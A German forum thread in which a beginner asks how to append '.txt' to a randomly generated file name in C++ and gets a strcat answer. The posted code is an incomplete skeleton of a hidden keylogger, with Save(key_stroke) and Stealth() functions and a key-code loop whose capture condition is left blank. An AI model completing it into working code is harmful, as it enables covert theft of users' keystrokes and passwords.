An ein Char die Endung ".txt" anhängen

Simpac

Grünschnabel
hey Leute..
Ich bräuchte mal Hilfe bei meinem Programm.

bisher erzeugt es ein Zufälligeswort, und erstellt dann eine Datei mit dem jeweiligen Zufallsnamen.. Nur dass die Datei nicht beschrieben werden kann, da die ".txt" endung fehlt.
Hier erstmal der Code:

Code:
#include <iostream>
#include <ctime>
#include <math.h>
using namespace std;
#include <windows.h>
#include <Winuser.h>

int Save (int key_stroke, char *file);
void Stealth();

void rword (char *word)
{
int len = rand () % 6 + 1;
word [len] = 0;
while (len) word [--len] = 'a' + rand () % 26;
}

int main ()
{
	
   char word[7];
    srand(time(0));
    rword(word);


    while (true)
    {
      for(int i = 8; i <= 190; i++)
      {
        if (blabla=blablub)
          Save (i,word);
      }
                
    }
    system ("PAUSE");
    return 0;
}

wenn ich die variable "word", welche ein zufallswort beinhaltet mithilfe eines strings die endung hinzufüge, gibt es ne fehlermeldung , dass Save nur chars behandeln kann. also wird das mit den strings nichts..
weiß da wer ne lösung, wie man an das "word" noch die Endung ".txt" anhängen kann?
danke schonmal
 
Hi und Willkommen bei tutorials.de,

mit "String" meinst du die C++-Klasse string?
Du könntest den String mit .c_str() zu einem char-Array umformen
(Was du da hast ist kein char, sondern char-Array. Ist ein großer Unterschied.)

Mit C-Mitteln ists aber auch nicht schwer.
Zuerst wort vergrößern (mit [7] könnte das ".txt" zu wenig Platz haben)
und dann
C++:
strcat(wort, ".txt");

Was ich aber nicht versteh: Warum kannst du die Datei
ohne ".txt" nicht öffnen? Die Endung hat keinen Einfluss auf den Inhalt.

Bitte Netiquette §15 beachten und cpp statt code nehmen
(Liste der möglichen Codetags in meiner Signatur verlinkt).

Gruß
 
Erstmal danke für den Willkommensgruß ! :)

Ja mit "String" war die C++Klasse string gemeint.
Ich bin noch recht neu im Programmierwesen und kann deshalb so kleine Probleme nicht selber lösen..
Google konnte mir auch nicht die gewünschte Antwort liefern.

Ich hab jetzt bemerkt, dass die Datei, die erstellt wird, ja auch so mithilfe des Editors auslesbar ist, und die Endung ".txt" demnach ziemlich sinnlos ist.

Sonst denke ich, dass "strcat(wort, ".txt");" die wahrscheinlich richtige Lösung sein wird.

Danke für die schnelle und hilfreiche Antwort!
 
Zurück